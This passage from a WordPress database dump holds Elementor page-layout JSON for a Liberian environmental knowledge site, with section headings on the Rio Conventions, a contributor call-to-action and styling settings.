fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#002600\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(6137,556,'_elementor_version','2.7.5'),(6138,556,'_elementor_template_type','wp-page'),(6139,556,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(6148,87,'ocean_post_subheading','Explore Key Topics related to the Rio Conventions'),(6149,87,'_elementor_edit_mode','builder'),(6150,87,'_elementor_template_type','wp-page'),(6151,87,'_elementor_version','2.7.5'),(6152,87,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"title_color\":\"rgba(0,0,0,0.99)\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"900\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7962ed9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"dc1b17b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a26f260\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"3\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"show_image_as\":\"background\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_type\",\"show_meta\":\"\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"rgba(0,100,0,0.22)\",\"content_bg\":\"rgba(0,0,0,0.22)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_alignment\":\"center\",\"title_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"title_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"terms_link_typography_font_weight\":\"900\",\"terms_link_bg_color\":\"rgba(110,193,228,0.77)\",\"terms_link_color\":\"rgba(0,0,0,0.5)\",\"_animation\":\"none\",\"animation_duration\":\"slow\",\"_background_background\":\"classic\",\"_element_vertical_align\":\"center\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dd5d187\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8c7d30\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"80e7dff\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"64e3d24\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(6153,557,'_elementor_controls_usage','a:0:{}'),(6154,557,'_wp_page_template','default'),(6155,557,'_elementor_edit_mode','builder'),(6156,557,'_elementor_template_type','wp-page'),(6157,557,'_elementor_version','2.7.5'),(6158,557,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention on Biological Diversity\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(6173,561,'_wp_page_template','default'),(6174,561,'_elementor_edit_mode','builder'),(6175,561,'_elementor_template_type','wp-page'),(6176,561,'_elementor_version','2.7.5'),(6177,561,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention on Biological Diversity\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"120368b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"67b8367\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cbea0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"41031e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"84fff34\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Framework Convention on Climate Change\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"79aac65\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a52e74\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae05976\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2d42ab0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e058d8c\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention on Biological Diversity\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3e3f0b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8c7ba54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(6180,562,'_wp_page_template','default'),(6181,562,'_elementor_edit_mode','builder'),(6182,562,'_elementor_template_type','wp-page'),(6183,562,'_elementor_version','2.7.5'),(6184,562,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention on Biological Diversity\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"120368b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"67b8367\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5aa5fea\",\"elType\":\"widget\",\"settings\":{\"count\":\"6\",\"grid_style\":\"masonry\",\"readmore_text\":\"Learn More\",\"excerpt_length\":\"15\"},\"elements\":[],\"widgetType\":\"oew-blog-grid\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cbea0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"41031e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"84fff34\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Framework Convention on Climate Change\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"79aac65\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a52e74\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae05976\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2d42ab0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e058d8c\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention on Biological Diversity\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3e3f0b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8c7ba54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(6194,564,'_wp_page_template','default'),(6195,564,'_elementor_edit_mode','builder'),(6196,564,'_elementor_template_type','wp-page'),(6197,564,'_elementor_version','2.7.5'),(6198,564,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direct